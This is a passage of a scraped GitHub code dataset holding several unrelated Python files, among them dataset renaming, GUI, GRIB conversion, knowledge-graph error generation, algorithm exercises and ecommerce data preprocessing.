37: 0, 38: 0,\n 41: 72107, 42: 72373, 43: 74810, 44: 74541, 45: 74910, 46: 50616, 47: 0, 48: 0,\n 51: 161095, 52: 161724, 53: 103487, 54: 0, 55: 0, 56: 0, 57: 0, 58: 0,\n 61: 87551, 62: 131268, 63: 95817, 64: 30952, 65: 0, 66: 0, 67: 0, 68: 0}\n fid = imgname.strip().split(\"_\")[0]\n cam = int(imgname.strip().split(\"_\")[1][1])\n seq = int(imgname.strip().split(\"_\")[1][3])\n frame = int(imgname.strip().split(\"_\")[2])\n count = imgname.strip().split(\"_\")[-1]\n # print(id)\n # print(cam) # 1\n # print(seq) # 2\n # print(frame)\n re = 0\n for i in range(1, seq):\n re = re + dict_cam_seq_max[int(str(cam) + str(i))]\n re = re + frame\n new_name = str(fid) + \"_c\" + str(cam) + \"_f\" + '{:0>7}'.format(str(re)) + \"_\" + count\n # print(new_name)\n return new_name\n\n\ndef gen_train_all_rename():\n path = \"./dataset/Market1501_prepare/train_all/\"\n folderName = []\n for root, dirs, files in os.walk(path):\n folderName = dirs\n break\n # print(len(folderName))\n\n for fname in folderName:\n # print(fname)\n\n if not os.path.exists(\"./dataset/market_rename/train_all/\" + fname):\n os.makedirs(\"./dataset/market_rename/train_all/\" + fname)\n\n img_names = []\n for root, dirs, files in os.walk(path + fname):\n img_names = files\n break\n # print(img_names)\n # print(len(img_names))\n for imgname in img_names:\n newname = parse_frame(imgname)\n # print(newname)\n srcfile = path + fname + \"/\" + imgname\n dstfile = \"./dataset/market_rename/train_all/\" + fname + \"/\" + newname\n shutil.copyfile(srcfile, dstfile)\n # break # 测试一个id\n\n\ndef gen_train_rename():\n path = \"./dataset/Market1501_prepare/train/\"\n folderName = []\n for root, dirs, files in os.walk(path):\n folderName = dirs\n break\n # print(len(folderName))\n\n for fname in folderName:\n # print(fname)\n\n if not os.path.exists(\"./dataset/market_rename/train/\" + fname):\n os.makedirs(\"./dataset/market_rename/train/\" + fname)\n\n img_names = []\n for root, dirs, files in os.walk(path + fname):\n img_names = files\n break\n # print(img_names)\n # print(len(img_names))\n for imgname in img_names:\n newname = parse_frame(imgname)\n # print(newname)\n srcfile = path + fname + \"/\" + imgname\n dstfile = \"./dataset/market_rename/train/\" + fname + \"/\" + newname\n shutil.copyfile(srcfile, dstfile)\n # break # 测试一个id\n\n\ndef gen_val_rename():\n path = \"./dataset/Market1501_prepare/val/\"\n folderName = []\n for root, dirs, files in os.walk(path):\n folderName = dirs\n break\n # print(len(folderName))\n\n for fname in folderName:\n # print(fname)\n\n if not os.path.exists(\"./dataset/market_rename/val/\" + fname):\n os.makedirs(\"./dataset/market_rename/val/\" + fname)\n\n img_names = []\n for root, dirs, files in os.walk(path + fname):\n img_names = files\n break\n # print(img_names)\n # print(len(img_names))\n for imgname in img_names:\n newname = parse_frame(imgname)\n # print(newname)\n srcfile = path + fname + \"/\" + imgname\n dstfile = \"./dataset/market_rename/val/\" + fname + \"/\" + newname\n shutil.copyfile(srcfile, dstfile)\n # break # 测试一个id\n\n\ndef gen_query_rename():\n path = \"./dataset/Market1501_prepare/query/\"\n folderName = []\n for root, dirs, files in os.walk(path):\n folderName = dirs\n break\n # print(len(folderName))\n\n for fname in folderName:\n # print(fname)\n\n if not os.path.exists(\"./dataset/market_rename/query/\" + fname):\n os.makedirs(\"./dataset/market_rename/query/\" + fname)\n\n img_names = []\n for root, dirs, files in os.walk(path + fname):\n img_names = files\n break\n # print(img_names)\n # print(len(img_names))\n for imgname in img_names:\n newname = parse_frame(imgname)\n # print(newname)\n srcfile = path + fname + \"/\" + imgname\n dstfile = \"./dataset/market_rename/query/\" + fname + \"/\" + newname\n shutil.copyfile(srcfile, dstfile)\n # break # 测试一个id\n\n\ndef gen_gallery_rename():\n path = \"./dataset/Market1501_prepare/gallery/\"\n folderName = []\n for root, dirs, files in os.walk(path):\n folderName = dirs\n break\n # print(len(folderName))\n\n for fname in folderName:\n # print(fname)\n\n if not os.path.exists(\"./dataset/market_rename/gallery/\" + fname):\n os.makedirs(\"./dataset/market_rename/gallery/\" + fname)\n\n img_names = []\n for root, dirs, files in os.walk(path + fname):\n img_names = files\n break\n # print(img_names)\n # print(len(img_names))\n for imgname in img_names:\n newname = parse_frame(imgname)\n # print(newname)\n srcfile = path + fname + \"/\" + imgname\n dstfile = \"./dataset/market_rename/gallery/\" + fname + \"/\" + newname\n shutil.copyfile(srcfile, dstfile)\n # break # 测试一个id\n\n\nif opt.Market:\n gen_train_all_rename()\n gen_train_rename()\n gen_val_rename()\n gen_query_rename()\n gen_gallery_rename()\n shutil.rmtree(\"./dataset/Market1501_prepare/\")\n print(\"Done!\")\n","repo_name":"Wanggcong/Spatial-Temporal-Re-identification","sub_path":"prepare.py","file_name":"prepare.py","file_ext":"py","file_size_in_byte":9327,"program_lang":"python","lang":"en","doc_type":"code","stars":367,"dataset":"github-code","pt":"61"} +{"seq_id":"25367575775","text":"from PySide6.QtWidgets import *\nfrom Stylesheet import GuiColor\nfrom PySide6.QtGui import QIcon\nfrom EthFrame import EthFrame\nfrom GuiButton import GuiButton\n\n\nclass PaymentFrame(QFrame):\n def __init__(self):\n super().__init__()\n self.setStyleSheet(GuiColor.LIGHT_SECONDARY.value)\n self.setFixedHeight(100)\n\n # layout\n self.layout = QHBoxLayout()\n self.setLayout(self.layout)\n\n # horizontal spacer\n self.layout.addSpacerItem(QSpacerItem(10, 10, QSizePolicy.Expanding, QSizePolicy.Fixed))\n\n # receive button\n self.request_button = GuiButton(\"\")\n self.request_button.setIcon(QIcon('Gui/icons/download_icon.png'))\n self.layout.addWidget(self.request_button)\n\n # horizontal spacer\n self.layout.addSpacerItem(QSpacerItem(10, 10, QSizePolicy.Expanding, QSizePolicy.Fixed))\n\n # memo and eth dial\n self.eth_frame = EthFrame()\n self.layout.addWidget(self.eth_frame)\n\n # horizontal spacer\n self.layout.addSpacerItem(QSpacerItem(10, 10, QSizePolicy.Expanding, QSizePolicy.Fixed))\n\n # sent button\n self.send_button = GuiButton(\"\")\n self.send_button.setIcon(QIcon(\"Gui/icons/paper_plane_icon.png\"))\n self.layout.addWidget(self.send_button)\n\n # horizontal spacer\n self.layout.addSpacerItem(QSpacerItem(10, 10, QSizePolicy.Expanding, QSizePolicy.Fixed))\n","repo_name":"aaronkopplin/Metallic-Desktop","sub_path":"Gui/PaymentFrame.py","file_name":"PaymentFrame.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39423423020","text":"\n\n\n\nimport xarray\nimport cfgrib\nimport glob\nimport os\n\n\n#where the NBM grib files are\ndatadir='/Volumes/SSD/Users/Travis/Programs/Air/python3/grib_to_zarr/NBM'\n#name of the NBM grib files to convert\nfiles='*grib2'\n#output directory for zarr files\noutdir='/Volumes/SSD/Users/Travis/Programs/Air/python3/grib_to_zarr/NBM_zarr'\n#concatenated grib file; no need to change\nmaster_grib='out.grib' \n\ndef main():\n concat()\n grib_to_zarr()\n\n\ndef concat():\n if not os.path.isfile(datadir+'/'+master_grib):\n print(\"Concatenating grib files\")\n with open(datadir+'/'+master_grib,'wb') as outfile:\n for filename in glob.glob(datadir+'/'+files):\n with open(filename, \"rb\") as infile:\n outfile.write(infile.read())\n\n\n\ndef grib_to_zarr():\n\n print(\"Converting gribs to zarr\")\n #if output directory doesn't exist, create it\n if not os.path.exists(outdir):\n os.makedirs(outdir)\n\n\n alldata = cfgrib.open_datasets(datadir+'/'+master_grib,backend_kwargs={'read_keys': ['gridType']})\n\n for data in alldata:\n print(\"\")\n \n for varname, da in data.data_vars.items():\n gribname = data[varname].attrs['long_name'] #long_name #GRIB_shortName\n gribname = gribname.replace(\" \", \".\")\n step = data[varname].attrs['GRIB_stepType']\n try: \n level = data[varname].attrs['GRIB_typeOfLevel']\n except:\n level = 'unknown'\n\n\n outfile = outdir + '/' + gribname+'_'+level+'_'+step\n \n print (outfile)\n d2 = data[varname].to_dataset()\n\n #without the load, rechunking on grib takes forever\n d2.load() \n\n #now chunk\n #don't put chunking before load, otherwise it loads the whole dataset, takes forever\n if 'x' in data[varname].dims and 'y' in data[varname].dims and 'step' in data[varname].dims:\n d2 = d2.chunk({\"x\":150, \"y\":150, \"step\": -1}) \n else:\n d2 = d2.chunk({\"x\":150, \"y\":150})\n\n d2.to_zarr(outfile+'.zarr',mode='w')\n d2.to_netcdf(outfile+'.nc',mode='w')\n\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"NOAA-GSL/idss-engine-commons","sub_path":"python/grib_to_zarr/GribToZarr.py","file_name":"GribToZarr.py","file_ext":"py","file_size_in_byte":2217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28241744063","text":"import bisect\r\n \r\nt = int(input())\r\nMOD = 1000000007\r\nfor _ in range(t):\r\n p, q, r = [int(x) for x in input().split()]\r\n a = [int(x) for x in input().split()]\r\n b = [int(x) for x in input().split()]\r\n c = [int(x) for x in input().split()]\r\n a.sort()\r\n c.sort()\r\n sum_a = []\r\n sum_c = []\r\n sum_a.append(a[0])\r\n sum_c.append(c[0])\r\n for i in range(1, p):\r\n sum_a.append((sum_a[i-1] + a[i]) % MOD)\r\n for i in range(1, r):\r\n sum_c.append((sum_c[i-1] + c[i]) % MOD)\r\n total = 0\r\n for i in range(q):\r\n inda = bisect.bisect_right(a, b[i])\r\n indc = bisect.bisect_right(c, b[i])\r\n # print(inda, indc, b[i])\r\n suma = 0\r\n sumc = 0\r\n if inda > 0 and indc > 0:\r\n suma = (sum_a[inda-1] + inda * b[i]) % MOD\r\n sumc = (sum_c[indc-1] + indc * b[i]) % MOD\r\n total += suma * sumc\r\n total %= MOD\r\n print(total) \r\n","repo_name":"abhiy13/CP-Solutions","sub_path":"Practice/SUMQ.py","file_name":"SUMQ.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"5773411335","text":"import os\nimport pandas as pd\nfrom sklearn import metrics\n\nimport VariantEncoderFactory\nfrom EventGraph import EventGraph\nfrom GraphConfigurator import GraphConfigurator\n\n\nclass TaskClusterExplorer:\n def __init__(self, graph, analysis_directory):\n print(\"Initializing task cluster evaluator...\")\n self.graph = graph\n self.analysis_directory = analysis_directory\n self.output_directory_variants_clustered = os.path.join(self.analysis_directory, \"variant_visualizations\")\n\n self.gc = GraphConfigurator(graph)\n self.eg = EventGraph(self.gc.get_password(), self.gc.get_entity_labels())\n\n self.df_variants_clustered = self.eg.query_cluster_variants()\n\n def get_variants_clustered(self):\n return self.df_variants_clustered\n\n def get_cluster_list(self):\n cluster_list = list(self.df_variants_clustered['cluster'].unique())\n return cluster_list\n\n def evaluate_silhouette_task_cluster_overlap(self, cluster_pair):\n e = VariantEncoderFactory.get_variant_encoder(self.gc.get_name_data_set())\n df_variants_to_evaluate = self.df_variants_clustered[self.df_variants_clustered['cluster'].str.get(0) == \"T\"].copy()\n df_variants_encoded = e.encode(df_variants_to_evaluate)\n df_variants_to_evaluate.loc[:, 'cluster'] = df_variants_to_evaluate['cluster'].str.lstrip(\n \"T\").astype('int')\n df_variants_to_evaluate.loc[:, 'cluster_tasks_merged'] = df_variants_to_evaluate['cluster']\n df_variants_to_evaluate.loc[\n df_variants_to_evaluate['cluster_tasks_merged'] == cluster_pair[0], 'cluster_tasks_merged'] = \\\n cluster_pair[1]\n s_score_tasks_merged = metrics.silhouette_score(df_variants_encoded.values,\n df_variants_to_evaluate['cluster_tasks_merged'].values)\n print(f\"Silhouette score tasks merged: {s_score_tasks_merged}\")\n s_score_original = metrics.silhouette_score(df_variants_encoded.values,\n df_variants_to_evaluate['cluster'].values)\n print(f\"Silhouette score original: {s_score_original}\")\n\n def common_actions_per_task_cluster_to_csv(self):\n cluster_list = list(self.df_variants_clustered['cluster'].unique())\n df_common_actions_per_cluster = pd.DataFrame(index=cluster_list, columns=['common_actions'])\n for cluster in cluster_list:\n df_cluster = self.df_variants_clustered[self.df_variants_clustered['cluster'] == cluster].copy()\n variants_in_cluster = list(df_cluster['path'])\n common_actions = list(set(variants_in_cluster[0]).intersection(*variants_in_cluster))\n df_common_actions_per_cluster.loc[cluster, 'common_actions'] = common_actions\n df_common_actions_per_cluster = df_common_actions_per_cluster.sort_index()\n df_common_actions_per_cluster.to_csv(f\"{self.analysis_directory}\\\\variant_common_actions_per_cluster.csv\")\n","repo_name":"eklijn/event-graph-analyzing-actor-dynamics","sub_path":"TaskClusterExplorer.py","file_name":"TaskClusterExplorer.py","file_ext":"py","file_size_in_byte":2992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70319207874","text":"import sys\n\nfrom argparse import ArgumentParser\nfrom util import loadGraphNpz, loadTypesNpz, load_entities_dict, load_types_dict, \\\n load_domains, load_ranges, load_relations_dict, to_triples, load_type_hierarchy, load_prop_hierarchy\nimport numpy as np\nfrom skge.sample import LCWASampler, CorruptedSampler, RandomSampler\nfrom random import randint\nfrom scipy.sparse import csr_matrix, coo_matrix\nfrom collections import defaultdict as ddict\nfrom tqdm import tqdm\nfrom copy import deepcopy\n\n\ndef generate_wrong_fact(X, types=None, domains=None, ranges=None, kind=1, p_error=0.001):\n\n assert kind == 1 or (kind == 2 and types is not None)\n\n triples = to_triples(X, order=\"sop\", dtype=\"list\")\n\n types_csc = types.tocsc(copy=True) if types is not None and types.nnz else None\n\n n_entities = X[0].shape[0]\n n_facts = sum([xi.nnz for xi in X])\n n_wrong_facts = int(n_facts * p_error)\n\n n_types = types.shape[1]\n omnipresent_types = [i for i in range(n_types) if types_csc is not None and types_csc[:,i].nnz == n_entities]\n\n print(\"%d erroneous facts of kind %d to be generated\" % (n_wrong_facts, kind))\n\n sample = np.random.choice(len(triples), n_wrong_facts, replace=False)\n to_be_corrupted = [triples[i] for i in sample]\n\n if kind > 0:\n print(\"Creating type groups\")\n pbar = tqdm(total=types.shape[0])\n types_entitities = ddict(lambda: set())\n for i, x in enumerate(types):\n types_entitities[tuple(x.indices)].add(i)\n pbar.update(1)\n pbar.close()\n\n errors_list = []\n print(\"Creating erroneous facts\")\n pbar = tqdm(total=len(to_be_corrupted))\n for t in to_be_corrupted:\n corrupted = list(t)\n\n # randomly choose between corrupt subject or object\n t_i = randint(0, 1)\n if kind > 0:\n while True:\n t_i = randint(0, 1)\n e = t[t_i]\n e_types = tuple(types[e].indices)\n same_types = types_entitities[e_types]\n if len(same_types) > 1 or kind != 1:\n break\n\n if kind and len(same_types) == n_entities and kind > 1:\n same_types = set()\n\n\n if kind == 1:\n while True:\n corrupted[t_i] = randint(0, n_entities - 1)\n if corrupted not in triples and corrupted not in errors_list:\n break\n\n elif kind == 2:\n candidates = [i for i in same_types if i != e]\n while True:\n corrupted[t_i] = candidates[randint(0, len(candidates) - 1)]\n if corrupted not in triples and corrupted not in errors_list:\n break\n\n else:\n raise(\"Error kind %d is not supported. Please choose from [1,2]\\n%s\" % kind)\n\n errors_list.append(tuple(corrupted))\n\n pbar.update(1)\n\n pbar.close()\n\n return errors_list\n\n\ndef update_data(X, errors):\n cols = [[] for p in range(len(X))]\n rows = [[] for p in range(len(X))]\n data = [[] for p in range(len(X))]\n for s, o, p in errors:\n rows[p].append(s)\n cols[p].append(o)\n data[p].append(True)\n\n for p in range(len(X)):\n X[p] = coo_matrix((list(X[p].data) + data[p], (list(X[p].row) + rows[p], list(X[p].col) + cols[p])),\n shape=X[p].shape)\n\n return X\n\n\nif __name__ == '__main__':\n parser = ArgumentParser(\n \"Generates error detection data in knowledge graphs by randomly corrupting triples in order to generate wrong facts. \"\n \"These wrong facts can be of three kinds:\"\n \" 1 - Randomly corrupted triple\"\n \" 2 - Same type as the original entity\")\n\n parser.add_argument(\"input\", type=str, default=None, help=\"Path of the input npz kb file\")\n parser.add_argument(\"-pe\", \"--p-error\", type=float, default=0.01, help=\"Proportion of errors to be generated\")\n parser.add_argument(\"-ek\", \"--error-kind\", type=int, default=1, help=\"Kind of errors to be generated [1,2]\")\n\n args = parser.parse_args()\n\n output_path = args.input.replace(\".npz\", \"-errdet-ek%d-p%f.npz\" % (args.error_kind, args.p_error))\n\n d = np.load(args.input, allow_pickle=True)\n X = d[\"data\"]\n types = d[\"types\"].item()\n domains = d[\"domains\"].item()\n ranges = d[\"ranges\"].item()\n entities_dict = d[\"entities_dict\"].item()\n relations_dict = d[\"relations_dict\"].item()\n types_dict = d[\"types_dict\"].item()\n type_hier = None\n prop_hier = None\n\n entities_dict = {k: v for v,k in entities_dict.items()}\n relations_dict = {k: v for v, k in relations_dict.items()}\n\n\n # if not isinstance(types, csr_matrix):\n # if not isinstance(types, coo_matrix):\n types = coo_matrix(types)\n types = types.tocsr()\n\n errors_list = generate_wrong_fact(X, types, domains, ranges, args.error_kind, args.p_error)\n\n X = update_data(X, errors_list)\n\n # Change node objects to ids to avoid maximum recursion depth\n if type_hier is not None:\n for i, n in type_hier.items():\n n.children = [c.node_id for c in n.children]\n n.parents = [p.node_id for p in n.parents]\n if prop_hier is not None:\n for i, n in prop_hier.items():\n n.children = [c.node_id for c in n.children]\n n.parents = [p.node_id for p in n.parents]\n\n np.savez(output_path, data=X,\n types=types,\n domains=domains,\n ranges=ranges,\n entities_dict=entities_dict,\n types_dict=types_dict,\n relations_dict=relations_dict,\n type_hierarchy=type_hier,\n prop_hierarchy=prop_hier,\n errors=errors_list)\n","repo_name":"aolimelo/kged","sub_path":"generate_errors.py","file_name":"generate_errors.py","file_ext":"py","file_size_in_byte":5659,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"37848086328","text":"from Util import sgn, DEFAULT_DIMENSION, Point\nfrom Barrier import Barrier\nfrom Water import WaterElement\nfrom Air import Air\nfrom Deflector import Deflector\n\nclass Board:\n def __init__(self, balls=None, barriers=None, deflectors=None, water=None, dim=None, verbose=False):\n self.balls = balls or []\n self.dim = dim or DEFAULT_DIMENSION\n self.barriers = barriers or []\n self.water = water or []\n self.history = []\n self.recordPositions()\n self.verbose = verbose\n self.deflectors = deflectors or []\n\n def recordPositions(self):\n self.history.extend(ball.pos for ball in self.balls)\n\n def getItemAt(self, x, y=None):\n if y is None:\n x, y = x\n for obj in self.water + self.barriers + self.deflectors:\n if obj.pos == Point(x,y):\n return obj\n return Air(x,y)\n\n def applyGravity(self):\n for ball in self.balls:\n there = self.getItemAt(ball.pos)\n below = self.getItemAt(ball.pos.x, ball.pos.y-1)\n if there.kind == 'air' and below.isYielding:\n ball.vy -= 1\n\n def update(self):\n for ball in self.balls:\n ball.move()\n\n self.resolveCollisions()\n self.recordPositions()\n\n self.applyGravity()\n if self.verbose:\n print(self.balls, '\\n\\n')\n\n def resolveCollisions(self):\n for ball in self.balls:\n for barrier in self.barriers:\n if ball.pos == barrier.pos:\n barrier.bounceBall(ball)\n\n for ball in self.balls:\n for waterElement in self.water:\n if ball.pos == waterElement.pos:\n waterElement.bouyBall(ball)\n\n for ball in self.balls:\n for deflector in self.deflectors:\n if ball.pos == deflector.pos:\n deflector.deflectBall(ball)\n\n def getArrayRepr(self):\n out = [[None]*self.dim.width for i in range(self.dim.height)]\n for waterElement in self.water:\n if self.isOnBoard(waterElement):\n out[(self.dim.height-1)-waterElement.y][waterElement.x] = waterElement.icon\n for barrier in self.barriers:\n if self.isOnBoard(barrier):\n out[(self.dim.height-1)-barrier.y][barrier.x] = barrier.char\n\n for deflector in self.deflectors:\n if self.isOnBoard(deflector):\n out[(self.dim.height-1)-deflector.y][deflector.x] = deflector.dir\n\n for ball in self.balls:\n if self.isOnBoard(ball):\n out[(self.dim.height-1)-ball.y][ball.x] = 'O'\n return out\n\n def isOnBoard(self, obj):\n return 0 <= obj.x < self.dim.width and 0 <= obj.y < self.dim.height\n\n def __str__(self):\n array = self.getArrayRepr()\n out = ''\n block = ''\n out += block*(len(array[0]) + 2) + '\\n'\n for row in array:\n out += block\n for el in row:\n out += el if el is not None else ' '\n out += block\n out += '\\n'\n out += block*(len(array[0]) + 2)\n return out\n","repo_name":"nathanfdunn/little-phys","sub_path":"Board.py","file_name":"Board.py","file_ext":"py","file_size_in_byte":3157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72615528834","text":"def encrypt(s):\r\n res = \"\"\r\n for letter in s:\r\n if letter != \" \":\r\n ascii_num = ord(letter) + 9\r\n letter = chr(ascii_num)\r\n if letter == \" \" or letter.isalpha():\r\n res += letter\r\n return res\r\n\r\ndef change_case(s):\r\n res = \"\"\r\n for letter in s:\r\n if letter.islower():\r\n letter = letter.upper()\r\n elif letter.isupper(): \r\n letter = letter.lower()\r\n res += letter\r\n\r\n return res\r\n\r\nmy_s = input()\r\nprint(encrypt(my_s))\r\nprint(change_case(encrypt(my_s)))\r\n","repo_name":"boce1/school","sub_path":"seminarni/3/primer3.py","file_name":"primer3.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42268235277","text":"import os\nimport pdb\nfrom networkx.readwrite import json_graph\nfrom query_representation.utils import *\nfrom query_representation.query import *\n\nOUTPUT_DIR=\"./queries/joblight/all_joblight/\"\nINPUT_FN = \"./queries/joblight.sql\"\nOUTPUT_FN_TMP = \"{i}.sql\"\n\nmake_dir(OUTPUT_DIR)\n\nwith open(INPUT_FN, \"r\") as f:\n data = f.read()\n\nqueries = data.split(\";\")\nfor i, sql in enumerate(queries):\n output_fn = OUTPUT_DIR + str(i+1) + \".pkl\"\n if \"SELECT\" not in sql:\n continue\n\n qrep = parse_sql(sql, None, None, None, None, None,\n compute_ground_truth=False)\n\n qrep[\"subset_graph\"] = \\\n nx.OrderedDiGraph(json_graph.adjacency_graph(qrep[\"subset_graph\"]))\n qrep[\"join_graph\"] = json_graph.adjacency_graph(qrep[\"join_graph\"])\n\n save_qrep(output_fn, qrep)\n\n","repo_name":"learnedsystems/CEB","sub_path":"scripts/sql_to_qrep.py","file_name":"sql_to_qrep.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"61"} +{"seq_id":"2171703090","text":"from dependency_injector.wiring import Provide, inject\nfrom ...BaseTypes.Handlers.DeviceBase import DeviceBase\n\n\nclass Device(DeviceBase):\n\n def __init__(self, iden: int):\n super().__init__(iden)\n\n @classmethod\n def __factoryCreate(cls, identifier):\n return cls(identifier)\n\n @classmethod\n @inject\n def Create(cls, identifier: int, deviceInstance=Provide[\"interop\"]):\n clsObj = cls.__factoryCreate(identifier)\n mapping = clsObj.Map(identifier)\n return mapping\n\n @inject\n def Map(self, identifier: int, instance=Provide[\"interop\"]):\n _device_ref = instance.DeviceRef\n try:\n if identifier is None:\n return\n\n _dev_set = _device_ref.SetId(identifier)\n\n if _dev_set > 0:\n name = _device_ref.GetName()\n r = self.__factoryCreate(_device_ref.GetId())\n return r\n\n except:\n raise\n\n finally:\n # clsObj.DisposeIdEx()\n pass\n","repo_name":"chrisbewz/e3-panel-distance-estimator","sub_path":"RouteEstimator/Implementations/E3Objects/DeviceComponent.py","file_name":"DeviceComponent.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43502902173","text":"\nimport numpy as np\nfrom perceptron_unigrams.utils import get_corpus_word_doc_count, create_word_index_map, get_key, get_doc_word_freq, build_sparse_unigram_dtm, build_sparse_tfidf_dtm\nfrom sklearn.model_selection import train_test_split\nfrom perceptron_unigrams.perceptron import Perceptron\n\n\ndef main():\n\n data = pd.read_csv('review_data.csv')\n\n X = data['text']\n y = data['label']\n\n word_doc_count = get_corpus_word_doc_count(X)\n\n # remove words that only appear in one document out of the entire corpus\n word_doc_count = {k: v for k, v in word_doc_count.items() if v != 1}\n\n # sort dictionary alphabetically by key\n word_doc_count = dict(sorted(word_doc_count.items(), key=lambda x: x[0]))\n\n word_index_map = create_word_index_map(word_doc_count)\n\n unigram_dtm = build_sparse_unigram_dtm(X, y, word_index_map)\n\n train, test = train_test_split(unigram_dtm, test_size=0.25, random_state=11)\n\n clf = Perceptron(n_epochs=2)\n clf.fit(train)\n\n y_pred = clf.predict(test)\n return y_pred\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"melsyt/machine-learning-hw","sub_path":"perceptron_unigrams/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26644021254","text":"'''\nПроцедура randomized_select() находит элемент массива, который находился бы в\nотсортированном массиве на месте с заданным индексом. В данной процедуре\nиспользуется модифицированный алгоритм быстрой сортировки, в котором после\nразделения рассматривается только одна часть массива, содержащая искомый\nэлемент.\n'''\n\n\nfrom random import randint\n\n\ndef randomized_select(A, i, p=0, r=None):\n if r is None:\n r = len(A)-1\n A = A.copy()\n return _randomized_select(A, i, p, r)\n\n\ndef _randomized_select(A, i, p, r):\n if p == r:\n return A[p]\n q = randomized_partion(A, p, r)\n k = q - p\n if i == k:\n return A[q]\n elif i < k:\n return _randomized_select(A, i, p, q-1)\n else:\n return _randomized_select(A, i-k-1, q+1, r)\n\n\ndef randomized_partion(A, p, r):\n i = randint(p, r)\n A[i], A[r] = A[r], A[i]\n return partion(A, p, r)\n\n\ndef partion(A, p, r):\n x = A[r]\n i = p - 1\n count_equal = 0\n for j in range(p, r):\n if A[j] <= x:\n if A[j] == x:\n count_equal += 1\n i += 1\n A[i], A[j] = A[j], A[i]\n A[i+1], A[r] = A[r], A[i+1]\n if count_equal == r - p:\n return (p + r) // 2\n else:\n return i + 1\n\n\ndef main():\n A = [13, 19, 9, 5, 9, 12, 8, 7, 4, 21, 2, 6, 11]\n print(randomized_select(A, 3))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Leonid-T/Algorithms","sub_path":"Divide-and-conquer/Randomized select/randomized_select.py","file_name":"randomized_select.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7103167111","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def kthSmallest(self, root: Optional[TreeNode], k: int) -> int:\n\n m=[]\n def dfs(root,k,m):\n\n if not root:\n return\n\n dfs(root.left,k,m)\n m.append(root.val)\n dfs(root.right,k,m)\n return\n\n dfs(root,k,m)\n\n\n return m[k-1]\n \n\n\n\n\n ","repo_name":"msaisridattaDev/leetcode","sub_path":"230-kth-smallest-element-in-a-bst/kth-smallest-element-in-a-bst.py","file_name":"kth-smallest-element-in-a-bst.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34811264755","text":"# импо��т библиотек\r\nimport pandas as pd\r\n\r\n# опции отображения\r\npd.set_option('display.max_columns', 10)\r\npd.set_option('display.expand_frame_repr', False)\r\n# Путь к к обрабатываемому датасету с данными\r\npath_data = 'ecommerce_data.csv'\r\n\r\n\r\ndef func_main(path: str) -> pd.DataFrame:\r\n \"\"\"Предварительная обработка датасета\"\"\"\r\n # Считываем датасет\r\n df = pd.read_csv(path, sep=',')\r\n # Приводим названия столбцов датасета к нижнему регистру\r\n list_col = list(map(str.lower, df.columns))\r\n df.columns = list_col\r\n # Избавляемся от времени и трансформируем строку-дату в правильный формат\r\n df['invoicedate'] = df['invoicedate'].apply(lambda x: x.split(' ')[0])\r\n df['invoicedate'] = pd.to_datetime(df['invoicedate'], format='%m/%d/%Y')\r\n # Рассчитываем сумму покупки по каждому товару\r\n df['amount'] = df['quantity'] * df['unitprice']\r\n # Удаляем ненужные для дальнейшего анализа столбцы\r\n df = df.drop(['stockcode', 'description', 'quantity', 'unitprice'], axis=1)\r\n # Заполняем строки, где не указан номер покупателя, константой 777777\r\n values = {'customerid': 777777}\r\n df = df.fillna(value=values)\r\n df['customerid'] = df['customerid'].astype('int')\r\n # Округляем общую сумму покупки до целового числа\r\n df = df.round({'amount': 0})\r\n df['amount'] = df['amount'].astype('int')\r\n # Удаляем все строки, в которых есть пропуски перед группировкой\r\n df = df.dropna()\r\n # Группируем строки, чтобы прийти к детализации до уровня одного чека\r\n df_result = df.groupby(by=['invoiceno', 'invoicedate', 'customerid', 'country']).agg({'amount': sum}).reset_index()\r\n return df_result\r\n\r\n\r\nif __name__ == \"__main__\":\r\n tbl = func_main(path_data)\r\n tbl.to_csv('ecommerce_data_new.csv', sep=',', index=False, date_format='%d.%m.%Y')\r\n print('A file is genereted!')\r\n","repo_name":"grishenkovp/publications","sub_path":"Habr/unit_economy/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2350,"program_lang":"python","lang":"ru","doc_type":"code","stars":9,"dataset":"github-code","pt":"61"} +{"seq_id":"23577744051","text":"import math\r\n\r\nfin = open('C-small-attempt4.in', 'r')\r\nfout = open('C-small-attempt4.out', 'w')\r\n\r\nt = int(fin.readline())\r\nfor i in xrange(1, t + 1):\r\n hd, ad, hk, ak, b, d = [int(s) for s in fin.readline().strip().split(\" \")]\r\n if ad >= hk:\r\n print>> fout, \"Case #{}: {}\".format(i, 1)\r\n continue\r\n if max(ad + b, ad + ad) >= hk and hd > ak:\r\n print>> fout, \"Case #{}: {}\".format(i, 2)\r\n continue\r\n if hd <= ak - d + ak - 2 * d:\r\n print>> fout, \"Case #{}: {}\".format(i, 'IMPOSSIBLE')\r\n 